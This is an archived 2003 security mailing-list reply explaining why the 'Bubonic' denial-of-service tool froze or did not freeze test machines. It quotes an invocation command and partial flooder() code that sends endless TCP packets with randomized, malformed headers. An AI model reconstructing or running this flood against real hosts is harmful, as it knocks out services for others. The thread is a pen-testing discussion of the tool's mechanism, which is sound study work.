|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
RE: Bubonic DoS tool
From: Yonatan Bokovza (Yonatan
xpert.com)
Date: Tue Mar 11 2003 - 04:09:40 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
> -----Original Message-----
> From: Indian Tiger [mailto:indiantigermailandnews.com]
> Sent: Thursday, February 06, 2003 18:43
> To: pen-testsecurityfocus.com
> Cc: silantioffline.com
> Subject: Bubonic DoS tool
>
>
> Hi All,
>
> I was testing the "Bubonic.c lame DoS against Windows 2000
> machines and
> certain versions of Linux in a test scenario over Linux 8.0.
> I have compiled
> it's source code and running it's binary as follows:
> # ./bubonic 10.3.10.22 10.3.8.70 100 1000
> On executing the above command, there was no observable
> immediate effect,
> but the Hub was showing the collisions (which were the Red
> Steady). Etherial
> shows the packets routed to desination.
> But after executing the command the destination machine must be
> blocked/freeze, but it's not happening.
The code is very easy to understand. The "interesting" part is
in flooder(), my comments inline:
void flooder(void)
{
...
packet.ip.ip_p = IPPROTO_TCP;
packet.ip.ip_tos = rand();
...
packet.tcp.th_flags = random();
packet.tcp.th_win = 65535;
packet.tcp.th_seq = random();
packet.tcp.th_ack = 0;
packet.tcp.th_off = 0;
packet.tcp.th_urp = random();
packet.tcp.th_dport = random();
...
cksum.pseudo.ptcl = IPPROTO_TCP;
cksum.pseudo.tcpl = random();
...
for(i=0;;++i) {
...
if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
}
}
To sum up and simplify, this sends TCP packets with bad header.
As a result, my unpatched win2k's CPU graph stays over 90%
in the kernel, causing Albinoni to sound bad.
Best Regards,
Yonatan Bokovza
IT Security Consultant
Xpert Systems
----------------------------------------------------------------------------
Are your vulnerability scans producing just another report?
Manage the entire remediation process with StillSecure VAM's
Vulnerability Repair Workflow.
Download a free 15-day trial:
http://www2.stillsecure.com/download/sf_vuln_list.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]